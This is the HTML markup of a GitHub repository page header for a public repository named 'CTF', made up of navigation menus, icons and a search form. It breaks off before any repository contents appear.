class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div> Explore All features Documentation <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> GitHub Skills <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Blog <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For Enterprise Teams Startups Education <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> By Solution CI/CD & Automation DevOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> DevSecOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Case Studies Customer Stories Resources <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> <div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div> <div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div> Repositories Topics Trending Collections </div> Pricing </nav> <div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0"> <div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="475531499" data-scoped-search-url="/TwentySick/CTF/search" data-owner-scoped-search-url="/users/TwentySick/search" data-unscoped-search-url="/search" data-turbo="false" action="/TwentySick/CTF/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="rvBDrzEmx3ug3EfQDQNWqMkVsJV3zGMVbSVC6E1RPZxEs/QzIJENjANsMocs4/RD/H9N6bEKfKfmE9QrZIj3mA==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> <div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <span>No suggested jump to results</span> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> </div> </label></form> </div></div> </div> <div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div> Sign up </div> </div> </div> </div></header> </div> <div id="start-of-content" class="show-on-focus"></div> <div id="js-flash-container" data-turbo-replace> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div> </div> </div></div> </template></div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" > <div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace> <div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;"> <div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> TwentySick </span> <span>/</span> CTF <span></span><span>Public</span> </div> </div> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span> <div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>1</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div> </div> <div id="responsive-meta-container" data-turbo-replace></div> <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax 